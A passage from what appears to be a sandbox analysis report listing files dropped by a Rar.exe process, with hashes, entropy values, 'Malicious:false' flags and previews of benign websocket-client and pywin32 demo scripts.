                                                                                                                                                                                      Entropy (8bit):4.871716808910192
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:ghZl4IpheU0E+4HQk1Gps2Xkdhh7DVzhvujBDznwWwXV6rsY9DcLTL:c4+h0CH31KzshpBNmfw1asY9QLn
                                                                                                                                                                                      MD5:475250E9018C5B5E6ACBDD569D95F96D
                                                                                                                                                                                      SHA1:8C658B1FCFC35A893B67AF5C72F19F57FAC58BA8
                                                                                                                                                                                      SHA-256:4913EDC35AD3DCB3D297DABBD260A2E615BD876C52FA721F75C5DB8F21A2F2C1
                                                                                                                                                                                      SHA-512:E012B6CF26558A50D47415B7EDF0D99DAC18FAC023AF2876AA441A4CFB74F86C6F091ABB073687A4CB14782B9861FBCF5E28C164831DC8E37F05CA0944142E8B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""._ssl_compat.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..""".__all__ = [. "HAVE_SSL",. "ssl",. "SSLError",. "SSLEOFError",. "SSLWantReadError",. "SSLWantWriteError",.]..try:. import ssl. from ssl import SSLError, SSLEOFError, SSLWantReadError, SSLWantWriteError.. HAVE_SSL = True.except ImportError:. # dummy class of SSLError for environment without ssl support. class SSLError(Exception):. pass..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5251
                                                                                                                                                                                      Entropy (8bit):4.621526969186157
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Q4s3HFK8KBQRosjPPqoBrIE5vKm0EehQyKSwGJBBK9WFSiwQ02oc:Q33HiBQRRLPRBrIE5vBhehAQkWwXc
                                                                                                                                                                                      MD5:2C6E42DED177F071FE509138942CA042
                                                                                                                                                                                      SHA1:64E129E8A17F325F5432F02F66908D28F8AE9501
                                                                                                                                                                                      SHA-256:91B11D6DD67E04C328610DEC31F729F50118D4862B0E9A48282A4820774654C7
                                                                                                                                                                                      SHA-512:39CCBEB99CAFEB7ACCA66307308BD9033B47B352CE2B08D48A391BFAB1CDE804E2FB97CC0EA59BEF603F4ABB2462F2AC5D8AFB3B41E3973104C5871CCD87EC42
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import socket.import struct.from typing import Optional.from urllib.parse import unquote, urlparse.from ._exceptions import WebSocketProxyException.."""._url.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""..__all__ = ["parse_url", "get_proxy_info"]...def parse_url(url: str) -> tuple:. """. parse url and the result is tuple of. (hostname, port, resource path and the flag of secure mode).. Parameters. ----------. u
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6961
                                                                                                                                                                                      Entropy (8bit):3.474420330492046
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:B4+h0CH31KzIUPv+CzljZnfzcP3/YmguB244D444444444444M4444MM44Y4444u:B4s3HFKzfljZQv/skWO9+bKIiReS9
                                                                                                                                                                                      MD5:63D88387C8231469A1A4776FDE1C2516
                                                                                                                                                                                      SHA1:B27C1C0B0E852EF2C2D17028B5FEB91DBADCD65D
                                                                                                                                                                                      SHA-256:477E859C54F16152722A587EC8469AA51C69A0AF17C27F491570B2DAADA1698D
                                                                                                                                                                                      SHA-512:CAE37ABC0DE8154874735FC4E9F28A04742A063434C2424192DD641A762D166A93A9335DFECE5EEB8CFBCEE2B7AD619B19AE6AF7AB1A55FDC960D612EDAE91C0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union.."""._url.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..""".__all__ = ["NoLock", "validate_utf8", "extract_err_message", "extract_error_code"]...class NoLock:. def __enter__(self) -> None:. pass.. def __exit__(self, exc_type, exc_value, traceback) -> None:. pass...try:. # If wsaccel is available we use compiled routines to validate UTF-8. # strings.. from wsaccel.utf8validator import Utf8V
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7010
                                                                                                                                                                                      Entropy (8bit):4.634055856631404
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:y4s3HFKr2kOrSlqOV5DA9RLsg3eJtIlllAZsjIHT4vsIE4ain34Ptv:y33HNk3pV5DA7ggYKTIzmY4ai3Ud
                                                                                                                                                                                      MD5:6A303F6C1A4BB89E2E1DA79702BB677B
                                                                                                                                                                                      SHA1:1A25992606D41928C5A1C2FD1318A7359F609C9B
                                                                                                                                                                                      SHA-256:915F362D62E50FA777BF338A395004AA47E8080FD092977485CF563764EADA43
                                                                                                                                                                                      SHA-512:C4C6F1C5F3A654894432683C6EFFCF174E1E2D296D0FF6B9959E26EBF4086494CC16BB7AFDD6BF72B0A68855AADF6EF388F8292C42AB514858E68E98B86A15C0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#!/usr/bin/env python3..""".wsdump.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""..import argparse.import code.import gzip.import ssl.import sys.import threading.import time.import zlib.from urllib.parse import urlparse..import websocket..try:. import readline.except ImportError:. pass...def get_encoding() -> str:. encoding = getattr(sys.stdin, "encoding", ""). if not encoding:. return "utf-8". else:. return en
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3769
                                                                                                                                                                                      Entropy (8bit):5.305394581961131
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kQjF50l7OosSFI3OmWkK/9mBckz7mAOc/cUWc/byKK6+bWLKZL7wpS7:PvosSFI+m/KVockvmTQzWQGX6+SLeL7b
                                                                                                                                                                                      MD5:3C3631F5328CBCB77729B6CB5A0A0766
                                                                                                                                                                                      SHA1:16461673640008E326354F1991A395DAE439F377
                                                                                                                                                                                      SHA-256:C68A1E175FB7784BD38307E2EBC5BC53D25C6272C89D2E04D4A53F3EBE66FD44
                                                                                                                                                                                      SHA-512:0656985EEF1C541C57989132E260FDB8BCB9A669910AFEAC786D92369DB2895703B9530C45B72692A247E343CF877C2C766017B3EDE2B8942613BCB87C2173B8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:## demonstrates using BackupRead and BackupWrite to copy all of a file's data streams...import ntsecuritycon.import pythoncom.import pywintypes.import win32api.import win32con.import win32file.import win32security.from pywin32_testutil import ob2memory, str2bytes.from win32com import storagecon..all_sd_info = (. win32security.DACL_SECURITY_INFORMATION. | win32security.DACL_SECURITY_INFORMATION. | win32security.OWNER_SECURITY_INFORMATION. | win32security.GROUP_SECURITY_INFORMATION.)..tempdir = win32api.GetTempPath().tempfile = win32api.GetTempFileName(tempdir, "bkr")[0].outfile = win32api.GetTempFileName(tempdir, "out")[0].print("Filename:", tempfile, "Output file:", outfile)..f = open(tempfile, "w").f.write("some random junk" + "x" * 100).f.close()..## add a couple of alternate data streams.f = open(tempfile + ":streamdata", "w").f.write("data written to alternate stream" + "y" * 100).f.close()..f = open(tempfile + ":anotherstream", "w").f.write("z" * 100).f.close()..## add
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3864
                                                                                                                                                                                      Entropy (8bit):5.094383698251194
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:G0oS/Su/+SPWFHlMOoCOFI3OmdkK/9mBcxHOc/xQeU0Z5xPKoFKZywfr4bK+cm+7:G0oS/Su/+SPsolFI+mqKVocxuQyYnP/k
                                                                                                                                                                                      MD5:C29BE863D643554228F038F7F88945CE
                                                                                                                                                                                      SHA1:200B238DF9D6AE6FC63BF5957DF04EBF9D699750
                                                                                                                                                                                      SHA-256:1D52C2DCBFEB2B6A90D28F513DFC286E3E1727B68795BE623266003FC3764FF6
                                                                                                                                                                                      SHA-512:E6793C97DC34AD5FAD5C206004B1BFA3AFF0E750E8E718764B6FFF7ADACF9D360A96F0C7CBC6C621C64268D4006BEC1FEF33B9D731667456EE7C0157E213B0BC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:## demonstrates using BackupSeek to enumerate data streams for a file.import struct..import pythoncom.import pywintypes.import win32api.import win32con.import win32file.from win32com import storagecon..stream_types = {. win32con.BACKUP_DATA: "Standard data",. win32con.BACKUP_EA_DATA: "Extended attribute data",. win32con.BACKUP_SECURITY_DATA: "Security descriptor data",. win32con.BACKUP_ALTERNATE_DATA: "Alternative data streams",. win32con.BACKUP_LINK: "Hard link information",. win32con.BACKUP_PROPERTY_DATA: "Property data",. win32con.BACKUP_OBJECT_ID: "Objects identifiers",. win32con.BACKUP_REPARSE_DATA: "Reparse points",. win32con.BACKUP_SPARSE_BLOCK: "Sparse file",.}..tempdir = win32api.GetTempPath().tempfile = win32api.GetTempFileName(tempdir, "bkr")[0].print("Filename:", tempfile)..f = open(tempfile, "w").f.write("some random junk" + "x" * 100).f.close()..f = open(tempfile + ":streamdata", "w").f.write("data written to alternate stream" + "y" * 100).f.clo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1243
                                                                                                                                                                                      Entropy (8bit):5.026032254838223
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:q+5UyeJ0El1Sa1g5SaqpWSnmnVuqidsgxExyYJXYathSy4rXG/iwS:eyfsytM5nmnVuTdsgRcXZ77PiH
                                                                                                                                                                                      MD5:23B53C129F0FD220900CB00417719477
                                                                                                                                                                                      SHA1:49432AFCED130D2038A15E2B8A71CF8B3B06150F
                                                                                                                                                                                      SHA-256:3593ED8F69F6A4886C77831170869FB096B1C253A7748CB905BAA5FA21222189
                                                                                                                                                                                      SHA-512:4DC7D107110F6D69EF61CE0286698C915130A82B83FC46FC6BB2B8ACCF6B4C9D2F92E06839FB399046E11822073C3091AC91C601EB6AFB8CB9CADCAAABD33FE9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32file...def ProgressRoutine(. TotalFileSize,. TotalBytesTransferred,. StreamSize,. StreamBytesTransferred,. StreamNumber,. CallbackReason,. SourceFile,. DestinationFile,. Data,.):. print(Data). print(. TotalFileSize,. TotalBytesTransferred,. StreamSize,. StreamBytesTransferred,. StreamNumber,. CallbackReason,. SourceFile,. DestinationFile,. ). ##if TotalBytesTransferred > 100000:. ## return win32file.PROGRESS_STOP. return win32file.PROGRESS_CONTINUE...temp_dir = win32api.GetTempPath().fsrc = win32api.GetTempFileName(temp_dir, "cfe")[0].fdst = win32api.GetTempFileName(temp_dir, "cfe")[0].print(fsrc, fdst)..f = open(fsrc, "w").f.write("xxxxxxxxxxxxxxxx\n" * 32768).f.close().## add a couple of extra data streams.f = open(fsrc + ":stream_y", "w").f.write("yyyyyyyyyyyyyyyy\n" * 32768).f.close().f = open(fsrc + ":stream_z", "w").f.write("zzzzzzzzzzzzzzzz\n" * 327
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3678
                                                                                                                                                                                      Entropy (8bit):4.93181107133077
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:fbFIef2CiZCVfCz1UbI6Pp16P7U0NUeVcUBwfyHMJ7:zHzVCzmTvetcum
                                                                                                                                                                                      MD5:B233DC4ABD6C31BBB7CD09796425F3FE
                                                                                                                                                                                      SHA1:2E815CE1731D3898825FE7C710C91B3F60AC0819
                                                                                                                                                                                      SHA-256:F2E14F3E7DA3E92929621EF1D8B638B5E6585C01500EAD7BD3235E74EB7537AE
                                                                                                                                                                                      SHA-512:7DC3AD3EE811802AA74DE243809724A7F04893FF22771A47239F7C1B5DC0DE0F3E4351A09C1B8BFE61126A588509E1E5715277D807F5170B97FFE82D7856C7AF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".This demonstrates the creation of miniversions of a file during a transaction..The FSCTL_TXFS_CREATE_MINIVERSION control code saves any changes to a new.miniversion (effectively a savepoint within a transaction).."""..import os.import struct..import win32api.import win32con.import win32file.import win32transaction.import winerror.import winioctlcon.from pywin32_testutil import str2bytes # py3k-friendly helper...def demo():. """. Definition of buffer used with FSCTL_TXFS_CREATE_MINIVERSION:. typedef struct _TXFS_CREATE_MINIVERSION_INFO{. USHORT StructureVersion;. USHORT StructureLength;. ULONG BaseVersion;. USHORT MiniVersion;}. """. buf_fmt = "HHLH0L" ## buffer size must include struct padding. buf_size = struct.calcsize(buf_fmt).. tempdir = win32api.GetTempPath(). tempfile = win32api.GetTempFileName(tempdir, "cft")[0]. print("Demonstrating transactions on tempfile", tempfile). f = open(tempfile, "w"). f.write("This is
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3360
                                                                                                                                                                                      Entropy (8bit):4.398214944508592
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kgYXIV9bVYIipZaa4YrZ8qOZ266bzrfRmm9CKXYzx27Kv06/9tOo57iYi:k7W9bVYFpZaCrZ8qOZJ6bz7cm9/YzgO8
                                                                                                                                                                                      MD5:BF88AD04588F165B826D3321E4203135
                                                                                                                                                                                      SHA1:C332E8523536EE5500782156459865DE0069DB37
                                                                                                                                                                                      SHA-256:5C0DF671D1FBF8EAAF0277B9A418707D15B72939BFD2DD82029FAB7F51E89F9E
                                                                                                                                                                                      SHA-512:AE99D655D60EBE9077788F3F4EE32D19C1A3B70D9274264997F05CECBAADD2219F4A8D49DDFB72A4A307FD2D8B6776EEAC94E173B66C3BE225F8EC02FE2DAA97
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import sys..import win32evtlog...def main():. path = "System". num_events = 5. if len(sys.argv) > 2:. path = sys.argv[1]. num_events = int(sys.argv[2]). elif len(sys.argv) > 1:. path = sys.argv[1].. query = win32evtlog.EvtQuery(path, win32evtlog.EvtQueryForwardDirection). events = win32evtlog.EvtNext(query, num_events). context = win32evtlog.EvtCreateRenderContext(win32evtlog.EvtRenderContextSystem).. for i, event in enumerate(events, 1):. result = win32evtlog.EvtRender(. event, win32evtlog.EvtRenderEventValues, Context=context. ).. print("Event {}".format(i)).. level_value, level_variant = result[win32evtlog.EvtSystemLevel]. if level_variant != win32evtlog.EvtVarTypeNull:. if level_value == 1:. print(" Level: CRITICAL"). elif level_value == 2:. print(" Level: ERROR"). elif level_value == 3:. print(" Level: WAR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):792
                                                                                                                                                                                      Entropy (8bit):4.872080815758319
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:jsf9CzpJr+9f12fR3Ng5Ed8f6W/PEUzv37:QYzvr+992fBNgk8nf3
                                                                                                                                                                                      MD5:D360933C44E9DEC9F75199B3651E6537
                                                                                                                                                                                      SHA1:CDF798EC67E65CB9FAA6AF7C1D3500AED59B87F0
                                                                                                                                                                                      SHA-256:A4AA23F9C16AA2E78A1A22A0C12B1854BC0019ABF33670672A52773C53249911
                                                                                                                                                                                      SHA-512:4E964A2BFA726740784CB6EC44EAA3EA7E70CCF78FC8678C87855A9C135E71142B01392E1ED8A4F0CD12DC909D04C1A38C4715486A99A57B4B7F8B178B6CDE4C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:## Demonstrates how to create a "pull" subscription.import win32con.import win32event.import win32evtlog..query_text = '*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]'..h = win32event.CreateEvent(None, 0, 0, None).s = win32evtlog.EvtSubscribe(. "System",. win32evtlog.EvtSubscribeStartAtOldestRecord,. SignalEvent=h,. Query=query_text,.)..while 1:. while 1:. events = win32evtlog.EvtNext(s, 10). if len(events) == 0:. break. ##for event in events:. ##.print(win32evtlog.EvtRender(event, win32evtlog.EvtRenderEventXml)). print("retrieved %s events" % len(events)). while 1:. print("waiting..."). w = win32event.WaitForSingleObjectEx(h, 2000, True). if w == win32con.WAIT_OBJECT_0:. break.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):692
                                                                                                                                                                                      Entropy (8bit):4.945280120308455
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:jVXv9/WEpLDZAEpJr+937U1KXASpvFKMwpM7tLNFKYVXWKdC/2BdVD49y4hfR3kF:jbWqzpJr+9bvFKTpyzFKYVXDq27VD49A
                                                                                                                                                                                      MD5:52D985F0616A0F7455B5F7910B07182D
                                                                                                                                                                                      SHA1:D4ACD75A93ACA5F4B3205A5AC340695A283A6039
                                                                                                                                                                                      SHA-256:B6027143EE94E0E332D3851E23948BF6A98C4F6FEC26262703FAF6774FE3355D
                                                                                                                                                                                      SHA-512:A53F1558E74F3E5B1C238E71A0EDD62BA0A5D0383C60F620B3489A8AA0387FA639BC871A14D042BB179C7E166E1413F672690B0E61F2E75D95CA10EA95C9BDC2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:## Demonstrates a "push" subscription with a callback function.import win32evtlog..query_text = '*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]'...def c(reason, context, evt):. if reason == win32evtlog.EvtSubscribeActionError:. print("EvtSubscribeActionError"). elif reason == win32evtlog.EvtSubscribeActionDeliver:. print("EvtSubscribeActionDeliver"). else:. print("??? Unknown action ???", reason). context.append(win32evtlog.EvtRender(evt, win32evtlog.EvtRenderEventXml)). return 0...evttext = [].s = win32evtlog.EvtSubscribe(. "System",. win32evtlog.EvtSubscribeStartAtOldestRecord,. Query="*",. Callback=c,. Context=evttext,.).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4397
                                                                                                                                                                                      Entropy (8bit):4.74911812392731
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MgzkJJSBpe8lEILIzeU/lC2PHVH+YSrcsanIP9YO8OoUCDfOxVkfGbHyZrfpx4l4:MgY2vpEIANCaHFGh9YlU+GxifBx4i
                                                                                                                                                                                      MD5:430E76B755434E0D55E9F95AFDB387D0
                                                                                                                                                                                      SHA1:53171BBFFB86036C9BC312DAC4FA358C0D2DDC32
                                                                                                                                                                                      SHA-256:CCB6A2880CAC7C9D67966F0185DBF8175F01F6C7DA76058D2B55E61CFA8FE687
                                                                                                                                                                                      SHA-512:8381D4E1BC373FE7DC798D2DE6A2E785667374436AFC9BDBA701733C08B627028FD76F0D5C0A194FAD7CC99994CC9290F3478CBB5FCAD09EB046F521B016BF2F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Contributed by Kelly Kranabetter..import os.import sys..import ntsecuritycon.import pywintypes.import win32security.import winerror..# get security information.# name=r"c:\autoexec.bat".# name= r"g:\!workgrp\lim".name = sys.argv[0]..if not os.path.exists(name):. print(name, "does not exist!"). sys.exit()..print("On file ", name, "\n")..# get owner SID.print("OWNER").try:. sd = win32security.GetFileSecurity(name, win32security.OWNER_SECURITY_INFORMATION). sid = sd.GetSecurityDescriptorOwner(). print(" ", win32security.LookupAccountSid(None, sid)).except pywintypes.error as exc:. # in automation and network shares we see:. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.'). if exc.winerror != winerror.ERROR_NONE_MAPPED:. raise. print("No owner information is available")..# get group SID.try:. print("GROUP"). sd = win32security.GetFileSecurity(name, win32security.GROUP_SECURITY_INFORMATI
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1184
                                                                                                                                                                                      Entropy (8bit):5.129410238641104
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:9a3KeaJjPAhAs/6tgRMBuXI/KPAoTAs/MtgRMBuXH:I3sGhAAQAMaAAuA3
                                                                                                                                                                                      MD5:07D0143379349CB71B6701D8BF4D2480
                                                                                                                                                                                      SHA1:8D13834D7BCEF11174F631C4EFDA3E45E18D31CB
                                                                                                                                                                                      SHA-256:AA67DE1EC080EEFAD5CA4F5054778915AF8F282C2AF7D76243E66F409A1365B5
                                                                                                                                                                                      SHA-512:13331E7E7504822C2F3E9C693E27774BAE16B3DDA738695C43EBB79DFB3102F573F957B2EF437CC0BC0732218300FCA1C9E1CBE9B78C81D15DB9949EF9E3A257
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import win32con.import win32gui..filter = "Python Scripts\0*.py;*.pyw;*.pys\0Text files\0*.txt\0".customfilter = "Other file types\0*.*\0"..fname, customfilter, flags = win32gui.GetSaveFileNameW(. InitialDir=os.environ["temp"],. Flags=win32con.OFN_ALLOWMULTISELECT | win32con.OFN_EXPLORER,. File="somefilename",. DefExt="py",. Title="GetSaveFileNameW",. Filter=filter,. CustomFilter=customfilter,. FilterIndex=1,.)..print("save file names:", repr(fname)).print("filter used:", repr(customfilter)).print("Flags:", flags).for k, v in list(win32con.__dict__.items()):. if k.startswith("OFN_") and flags & v:. print("\t" + k)..fname, customfilter, flags = win32gui.GetOpenFileNameW(. InitialDir=os.environ["temp"],. Flags=win32con.OFN_ALLOWMULTISELECT | win32con.OFN_EXPLORER,. File="somefilename",. DefExt="py",. Title="GetOpenFileNameW",. Filter=filter,. CustomFilter=customfilter,. FilterIndex=0,.)..print("open file names:", repr(f
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3508
                                                                                                                                                                                      Entropy (8bit):4.535330596706897
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:qLKMszTwVasgHhCIlwaoHHqohRohw36Fup8dZpIhyA:qLlszYa7QIlwaonqkRkw36c83gyA
                                                                                                                                                                                      MD5:A703B33F30ADDE0B10973667F662CC7F
                                                                                                                                                                                      SHA1:D93572C859D1AC36ABE313452812B68BC14B9E7C
                                                                                                                                                                                      SHA-256:EA659B89FF3F9F1959C2B7AF8F075A0A2099533AFE7EB1CA7E72957732A05FF0
                                                                                                                                                                                      SHA-512:45C55EE1037C5F25BE8F4B796A55D12E37DCB965F5DAC48E62903DB75AD984775CC5D13E81372EB94F8CE256CAD97E055F6BE8060CD835A213AFC468493E3459
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A demo of using win32net.NetValidatePasswordPolicy...Example usage:..% NetValidatePasswordPolicy.py --password=foo change.which might return:..> Result of 'change' validation is 0: The operation completed successfully...or depending on the policy:..> Result of 'change' validation is 2245: The password does not meet the.> password policy requirements. Check the minimum password length,.> password complexity and password history requirements...Adding --user doesn't seem to change the output (even the PasswordLastSet seen.when '-f' is used doesn't depend on the username), but theoretically it will.also check the password history for the specified user...% NetValidatePasswordPolicy.py auth..which always (with and without '-m') seems to return:..> Result of 'auth' validation is 2701: Password must change at next logon."""..import optparse.import sys.from pprint import pprint..import win32api.import win32net.import win32netcon...def main():. parser = optparse.OptionParser(. "%pr
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2023
                                                                                                                                                                                      Entropy (8bit):5.051057812294554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tYq2r8q7QjxNaerKec8dsgkcXKna4uuD44Drd:tYqSaaGKd8d/kcana4Brd
                                                                                                                                                                                      MD5:1579B6CDBB6769E65896F32483CA08F5
                                                                                                                                                                                      SHA1:D7FFA56CC5E829FFA5BCBB145644E0AB219DEB6C
                                                                                                                                                                                      SHA-256:79D916989C1CA439CD602BF8C7A5FB7749421D64E0BFACBFF039B3F91E39A24A
                                                                                                                                                                                      SHA-512:F34B2045343CD21CAB62955D197CEE1969998680FDA080CE7FFD4C904B9C38536193C2330E321FCCD14224F8258BBFC51DB963F61472C9293525C253B9BA9360
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import win32api.import win32file.import winerror...def ReadCallback(input_buffer, data, buflen):. fnamein, fnameout, f = data. ## print fnamein, fnameout, buflen. f.write(input_buffer). ## python 2.3 throws an error if return value is a plain int. return winerror.ERROR_SUCCESS...def WriteCallback(output_buffer, data, buflen):. fnamebackup, fnameout, f = data. file_data = f.read(buflen). ## returning 0 as len terminates WriteEncryptedFileRaw. output_len = len(file_data). output_buffer[:output_len] = file_data. return winerror.ERROR_SUCCESS, output_len...tmp_dir = win32api.GetTempPath().dst_dir = win32api.GetTempFileName(tmp_dir, "oef")[0].os.remove(dst_dir).os.mkdir(dst_dir).print("Destination dir:", dst_dir)..## create an encrypted file.fname = win32api.GetTempFileName(dst_dir, "ref")[0].print("orig file:", fname).f = open(fname, "w").f.write("xxxxxxxxxxxxxxxx\n" * 32768).f.close().## add a couple of extra data streams.f = open(fname + ":stre
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1912
                                                                                                                                                                                      Entropy (8bit):4.996086312535218
                                                                                                                                                                                      Encrypted:false
